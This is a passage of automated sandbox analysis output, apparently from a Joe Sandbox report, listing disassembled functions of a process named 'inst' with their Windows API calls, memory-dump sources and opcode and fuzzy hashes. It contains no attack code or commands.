                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F56F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F575000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F57A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F5BC000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4159004826.000000005F5BF000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ioctlsocket
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3577187118-0
                                                                                                                                                                      • Opcode ID: 7ad8efbcd0818ce2f34e725ab4bc4fbc24b1d1210fe81b3a96e150172aba406e
                                                                                                                                                                      • Instruction ID: 4ae9a898d6eb13a4586f9cf2f621f40cc0f8d349738fef7c56ea77ecf1b1c887
                                                                                                                                                                      • Opcode Fuzzy Hash: 7ad8efbcd0818ce2f34e725ab4bc4fbc24b1d1210fe81b3a96e150172aba406e
                                                                                                                                                                      • Instruction Fuzzy Hash: DCC04C7B114101ABCB055B64CD5D88EBEA1BF59375B24C61DF16AC50F1D732C4B5EB01
                                                                                                                                                                      Function 001B2E1E Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • CallWindowProcW.USER32(?,?,?,?,?), ref: 001B2E30
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CallProcWindow
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2714655100-0
                                                                                                                                                                      • Opcode ID: 36c62c47cb4205e2a17670ba39253104922a83b9cab5168fbf2d902b0b437c18
                                                                                                                                                                      • Instruction ID: 0efac8eb3058b8c57beff953e44f4f5868a7f63154b8b9815077d28a818e0ca6
                                                                                                                                                                      • Opcode Fuzzy Hash: 36c62c47cb4205e2a17670ba39253104922a83b9cab5168fbf2d902b0b437c18
                                                                                                                                                                      • Instruction Fuzzy Hash: 3BC0013A008240FFCE024B80DD08D0ABFB2BFA8325B11C858B2A848031C7338032EB02
                                                                                                                                                                      Function 001A5E24 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • CallWindowProcW.USER32(?,?,?,?,?), ref: 001A5E36
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CallProcWindow
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2714655100-0
                                                                                                                                                                      • Opcode ID: 36c62c47cb4205e2a17670ba39253104922a83b9cab5168fbf2d902b0b437c18
                                                                                                                                                                      • Instruction ID: 0efac8eb3058b8c57beff953e44f4f5868a7f63154b8b9815077d28a818e0ca6
                                                                                                                                                                      • Opcode Fuzzy Hash: 36c62c47cb4205e2a17670ba39253104922a83b9cab5168fbf2d902b0b437c18
                                                                                                                                                                      • Instruction Fuzzy Hash: 3BC0013A008240FFCE024B80DD08D0ABFB2BFA8325B11C858B2A848031C7338032EB02
                                                                                                                                                                      Function 001A3EE0 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • CallWindowProcW.USER32(?,?,?,?,?), ref: 001A3EF2
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CallProcWindow
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2714655100-0
                                                                                                                                                                      • Opcode ID: 36c62c47cb4205e2a17670ba39253104922a83b9cab5168fbf2d902b0b437c18
                                                                                                                                                                      • Instruction ID: 0efac8eb3058b8c57beff953e44f4f5868a7f63154b8b9815077d28a818e0ca6
                                                                                                                                                                      • Opcode Fuzzy Hash: 36c62c47cb4205e2a17670ba39253104922a83b9cab5168fbf2d902b0b437c18
                                                                                                                                                                      • Instruction Fuzzy Hash: 3BC0013A008240FFCE024B80DD08D0ABFB2BFA8325B11C858B2A848031C7338032EB02
                                                                                                                                                                      Function 5F4DA564 Relevance: 1.5, APIs: 1, Instructions: 7threadCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • FreeLibraryAndExitThread.KERNEL32(5F4D0000,00000000,5F4DA86A), ref: 5F4DA570
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4158576782.000000005F4D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158731034.000000005F54F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F56F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F575000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F57A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F5BC000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4159004826.000000005F5BF000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ExitFreeLibraryThread
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4122534561-0
                                                                                                                                                                      • Opcode ID: c67535aa9450a01f09a7612acc8ac36565b1b572ae05c3b7a0d565ee49a10629
                                                                                                                                                                      • Instruction ID: 3b7faedafc9e4c5c5c2f880be4ffc04261a737f2d9bd05a1d1e5bac6946f3a00
                                                                                                                                                                      • Opcode Fuzzy Hash: c67535aa9450a01f09a7612acc8ac36565b1b572ae05c3b7a0d565ee49a10629
                                                                                                                                                                      • Instruction Fuzzy Hash: E3B01270F00201A7EE108F348E2DF013EE8A7407B0F50C048F00AE7185D660E214CE34
                                                                                                                                                                      Function 001967D0 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • PostMessageW.USER32(?,000007E9,?,?), ref: 001967E0
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MessagePost
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 410705778-0
                                                                                                                                                                      • Opcode ID: 5196a3d8cd1f542b65744f96bfd03cca7485a58f7d1beec94450ff3928d03acb
                                                                                                                                                                      • Instruction ID: 970c5237e4089ba340d7082bb97f71645971797314224eadc7b4c5ea6a9d7ae0
                                                                                                                                                                      • Opcode Fuzzy Hash: 5196a3d8cd1f542b65744f96bfd03cca7485a58f7d1beec94450ff3928d03acb
                                                                                                                                                                      • Instruction Fuzzy Hash: 07B0923A909241BFCE029B60DD0AC8EBE72BBA8384F81C449B28804070C63280B0EF02
                                                                                                                                                                      Function 00183CED Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: __locking
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 793501599-0
                                                                                                                                                                      • Opcode ID: 8de71eea63014ef0e9bc0fb451592f828a1a23cc2667e30a76acf752c6adc1a6
                                                                                                                                                                      • Instruction ID: 5750712f005d01e7a09000dca6e296e134b445f682364913d3d976592795036f
                                                                                                                                                                      • Opcode Fuzzy Hash: 8de71eea63014ef0e9bc0fb451592f828a1a23cc2667e30a76acf752c6adc1a6
                                                                                                                                                                      • Instruction Fuzzy Hash: B7B0027A408640BECA025B51AC55D1EBBA2ABA8720F54C959B5A800121D7329574EB53
                                                                                                                                                                      Function 001A6959 Relevance: 1.3, APIs: 1, Instructions: 13COMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,001A69EF,001A68D3,00000000,00000000,00000001,00000000,00000000,?,00000000,00000000,?,001A74F6,?,&pid=), ref: 001A696A
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseHandle
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2962429428-0
                                                                                                                                                                      • Opcode ID: 1886c90c142b1fcf5bbc5cd801cad02c32adb754f7e13c88d15268c66bb94fbb
                                                                                                                                                                      • Instruction ID: 7b7889f595e32e4982ba64821cee7c5e9b2b7c41c3ceb6eec030331cc60e71c7
                                                                                                                                                                      • Opcode Fuzzy Hash: 1886c90c142b1fcf5bbc5cd801cad02c32adb754f7e13c88d15268c66bb94fbb
                                                                                                                                                                      • Instruction Fuzzy Hash: 19D05E710107118BC7308F24E90835276F8AF00B39F248A0CA5B6875D0C774D8408A50
                                                                                                                                                                      Function 001829D7 Relevance: 1.3, APIs: 1, Instructions: 13COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • TlsGetValue.KERNEL32(00000018), ref: 001829E6
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Value
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3702945584-0
                                                                                                                                                                      • Opcode ID: e12e2ecdf7ca73aabfad501042ddd7407fb52952015119a37efaedf7b43f0b1d
                                                                                                                                                                      • Instruction ID: 6ea7aae9919c4dfe7007963bdc710e508f117af73e5110a105a527806eb3f607
                                                                                                                                                                      • Opcode Fuzzy Hash: e12e2ecdf7ca73aabfad501042ddd7407fb52952015119a37efaedf7b43f0b1d
                                                                                                                                                                      • Instruction Fuzzy Hash: BED0C739504110BFCF016774AC0546A7796AB55334F708A18F575C10A0D77589105F11
                                                                                                                                                                      Function 00184C5A Relevance: 1.3, APIs: 1, Instructions: 13COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • TlsGetValue.KERNEL32(00000018), ref: 00184C69
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Value
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3702945584-0
                                                                                                                                                                      • Opcode ID: f41aef1a6f77089cca41d83278430074978118d518e661e208801593f4ae496e
                                                                                                                                                                      • Instruction ID: fa43d47bb399af6dc6262ec9c205be5d434b1ff1e133319f74b1e7c4159ef123
                                                                                                                                                                      • Opcode Fuzzy Hash: f41aef1a6f77089cca41d83278430074978118d518e661e208801593f4ae496e
                                                                                                                                                                      • Instruction Fuzzy Hash: 77D01234206111BFDF016774AD489697796AB94730FB1CB1CF971C11E0DB34DA009F11
                                                                                                                                                                      Function 00183D33 Relevance: 1.3, APIs: 1, Instructions: 13COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • TlsGetValue.KERNEL32(00000018), ref: 00183D42
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Value
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3702945584-0
                                                                                                                                                                      • Opcode ID: 8e4be650e635880c8fcf2305ec91b771c94007f57ece875d773499f801ee03f8
                                                                                                                                                                      • Instruction ID: 25f422ffce83fbdae5abd2d2ae42526858f383edc0e68abdac70b8b7d38edb5e
                                                                                                                                                                      • Opcode Fuzzy Hash: 8e4be650e635880c8fcf2305ec91b771c94007f57ece875d773499f801ee03f8
                                                                                                                                                                      • Instruction Fuzzy Hash: 6AD0C934204100BFCF456BB4EC488AA77A2EF94730FA0CF18F575C20A0C7358A10AF12
                                                                                                                                                                      Function 00183DA6 Relevance: 1.3, APIs: 1, Instructions: 12COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • TlsGetValue.KERNEL32(00000018), ref: 00183DB5
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Value
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3702945584-0
                                                                                                                                                                      • Opcode ID: c30d660c206146c0a5c4b1f82f83852cdf5fb601dcc83f7e218f451a7802a52c
                                                                                                                                                                      • Instruction ID: 21ae01de940dacb3c4863036265a8439752d98259736261b24f0eca26b1e0820
                                                                                                                                                                      • Opcode Fuzzy Hash: c30d660c206146c0a5c4b1f82f83852cdf5fb601dcc83f7e218f451a7802a52c
                                                                                                                                                                      • Instruction Fuzzy Hash: 72D01234104101ABCF4577B4ED088BD7AA2BB54360B904F58F9B1C11F0C735CA44AF11